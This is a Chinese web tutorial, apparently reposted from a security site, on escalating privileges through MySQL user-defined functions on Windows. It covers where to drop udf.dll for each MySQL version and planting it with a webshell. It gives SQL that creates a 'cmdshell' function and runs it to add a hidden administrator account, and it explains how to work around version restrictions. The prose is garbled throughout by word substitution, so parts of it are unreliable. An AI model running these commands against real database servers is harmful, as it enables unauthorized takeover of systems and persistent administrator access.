|
|
|
联系客服020-83701501

udf提权方法和出现问题汇总

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
udf提权方法和呈现标题汇总

一、适用条件

1.指标系统是Windows(Win2000,XP,Win2003);

2.你已经拥有MYSQL的某个用户账号,此账号必需有对mysql的insert和delete权限以建立和屏弃函数(MYSQL文档原语)。

3.有root账号密码

二、导出udf

MYSQL 5.1以下版本导出息径:

C:Winntudf.dll??? 2000
C:Windowsudf.dll 2003(有的系统被原义,必要改为C:Windowsudf.dll)

导出DLL文件,导出时请勿必注意导出息径(集体环境下对任何目次可写,无需思忖权限标题)

MYSQL 5.1以上版本,必必要把udf.dll文件放到MYSQL装置目次下的libplugin文件夹下材干建立自界说函数

概略再mysql里输出

select @@basedir

show variables like ‘%plugins%’?? 探讨mysql装置路径

该目次默认是不存在的,这就必要我们使用webshell找到MYSQL的装置目次,并在装置目次下建立libplugin文件夹,尔后将udf.dll文件导出到该目次便可。

三、提权

使用SQL语句建犯罪能函数。语法:Create Function 函数名(函数名只能为上面列表中的其中之一)returns string soname ‘导出的DLL路径’;

create function cmdshell returns string soname ‘udf.dll’
select cmdshell(‘net user arsch arsch /add’);
select cmdshell(‘net localgroup administrators arsch /add’);

drop function cmdshell;

总结:

mysql中否决UDF扩充 ,使得我们概略调用DLL外表的函数来实现一些不凡的听命。
但是关于UDF的详细限定,MYSQL的各个版本各有分歧。 上面记录一下:

在MYSQL 4.1之前的版本中,概略将全部的DLL文件外表的任何函数都注册到MYSQL外表以供MYSQL调用。
岂论这个DLL在什么位置,函数的申明是什么样的。

在MYSQL 4.1及以后的版本中,对UDF函数中断了限定,只需实现了一个特定接口的函数才概略被胜利注册到MYSQL中,
何等就贯注了颠末MYSQL不法调用系统的DLL。

在MYSQL5.0以后,对注册的DLL的位置有了限定,建立函数的时候,所对应的DLL不克不及收罗/大概,繁杂的理解便是不克不及是相对路径。
以是我们将DLL监禁到system32目次,来跳过这个限定..大概放到盘符的根目次下颠末c:udf.dll这种形式的写法来跳过限定。

过后缔造原来只要把dll放到PATH这个环境变量所表示的任何一个目次上面,造诣跟放到system32目次上面一样。

再说MYSQL5.1,这里有个标题置信大师会时时碰到的。。
大师有的时候在建立函数的时候,每每会碰到:
数据库查讯犯错,请检查SQL语句create function cmdshell returns string soname ‘udf.dll’的语法能否切确。Function ‘cmdshell’already exists

官方描写如下:

http://bugs.mysql.com/bug.php?id=15439

Description:
Under some circumstances, case handling of UDF names leads to strange behaviour.
This can result in a situation where the function can be successfully dropped
without actually removing the corresponding entry from the mysql.func table.

…………这是因为MYSQL 5.1及以后的版本中,又多了一个限定。
建立函数时所用的DLL只能放在mysql的plugin目次外表。。
并且这个plugin目次默认是不存在的。。概略或许便是为了贯注颠末into dumpfile将DLL来写到这个文件夹。。
MYSQL是没法建立目次的, 假定into dumpfile的指标目次不存在是会报错的。

以是在导出UDF提权之前 ,先肯定一下MYSQL的版本是有必要的。

假定是5.1以后的,那就不行了,假定是5.1之前的版本建立函数的时候还报Can’t open shared library这个不对。
那就要看看DLL是不是真的被导出了,还是被杀软隔绝大概干掉了。

关于提权有兴趣的伴侣概略参考本站的提权消息板块【点此进入:提权】

本文转自Internet由Internet安然攻防钻研室(www.91ri.org)消息安然小组征集整顿。

数安新闻+更多

证书相关+更多